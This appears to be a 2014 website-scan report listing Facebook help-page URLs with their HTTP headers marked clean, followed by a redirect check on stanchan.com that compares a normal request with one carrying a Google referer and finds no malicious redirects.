https://www.facebook.com/help | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:41 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=YdKgVA1tbTBVGMs6RMBcRTpO; expires=Wed, 28-Dec-2016 04:02:41 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: n1Kk3SOb80e/RrIh0TCq04Ol4ccdSLe1WI7wixRYpNl4OHlvHyye5FwuObetJaeXx7MIFCsM4qVHTpIprwHf5A== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help?_fb_noscript=1 | 200 OK Content-Length: 56775 Content-Type: text/html | clean |
https://www.facebook.com/help/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:42 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=YtKgVElBbvGmDJKNycOVN9Lx; expires=Wed, 28-Dec-2016 04:02:42 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: 5jMJ51AJi+0qHbp5unpDYCxhV7PDMAjhNkp83dT70/2DGcDJ3SSqqX9ZZS5Z2rdihDU4BGYDAbIgYmMfiEMp8A== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/?_fb_noscript=1 | 200 OK Content-Length: 56787 Content-Type: text/html | clean |
https://www.facebook.com/help/292105707596942 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:44 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=Y9KgVNv6eS2_yVTinKdezAUR; expires=Wed, 28-Dec-2016 04:02:43 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F292105707596942; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F292105707596942; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: D5iehr1k5VzdQw2isTXFAh4xnojHsBULTitsgNxYx6M999wok/pYJMcvCg92+RX25x0gfXU4ysAStZwurLTNzA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/292105707596942?_fb_noscript=1 | 200 OK Content-Length: 108779 Content-Type: text/html | clean |
https://www.facebook.com/help/393592270693739 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:45 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=ZdKgVK676vRN4CrnVa7phvDs; expires=Wed, 28-Dec-2016 04:02:45 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F393592270693739; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F393592270693739; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: 3v9XDAzXmyIFDL0SgLUEEuLzQ4F7vblQ+wFaN2KPpMtrQ6pAzlj12y72byFDSGCUBMCfMRqFzmaHlDHucR3E8g== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/393592270693739?_fb_noscript=1 | 200 OK Content-Length: 53765 Content-Type: text/html | clean |
https://www.facebook.com/help/133234170146522 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:47 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=ZtKgVIJMpr88WrSkO76VypJ8; expires=Wed, 28-Dec-2016 04:02:46 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F133234170146522; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F133234170146522; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: AnDFH1tsXGKM+qVpGvz6ozXlhDBbkcr5oRLtQLjDV0V/vnsASxXsZVH6npZQ/EjewpbGkPcFcBJ+o8hf9c/bZA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/133234170146522?_fb_noscript=1 | 200 OK Content-Length: 51138 Content-Type: text/html | clean |
https://www.facebook.com/help/345121355559712 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:48 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=aNKgVLMwG0T0umUNroPgSCMo; expires=Wed, 28-Dec-2016 04:02:48 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F345121355559712; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F345121355559712; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: XSsI2GudzCWrmmbJU7D+cIZh1QZbaDBwGBWDRA2888VrX6Lp6V+bNW0VpktAe62GcpA4IbYBmNFklpyRL01O3w== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/345121355559712?_fb_noscript=1 | 200 OK Content-Length: 81150 Content-Type: text/html | clean |
https://www.facebook.com/help/376335499080938 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:49 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=adKgVL1dyxOLQX92gz_WlUbP; expires=Wed, 28-Dec-2016 04:02:49 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F376335499080938; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F376335499080938; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: yTfy2HaCVEaTRciORHThGj9wytLPd/vXoLmq0if8FpzhT9/P0H4QPl6EPOVSyd0UY+LBbGsTOC4SowOm8VugeA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/376335499080938?_fb_noscript=1 | 200 OK Content-Length: 72082 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stanchan.com
Result:
HTTP/1.1 200 OK
Date: Mon, 29 Dec 2014 04:02:25 GMT
Accept-Ranges: bytes
ETag: "16875b28217dcb1:d70dd"
Server: Microsoft-IIS/6.0
Content-Length: 20538
Content-Location: http://stanchan.com/welcome.html
Content-Type: text/html
Last-Modified: Fri, 05 Nov 2010 19:39:27 GMT
X-Powered-By: ASP.NET
...20538 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: stanchan.com
Referer: http://www.google.com/search?q=stanchan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.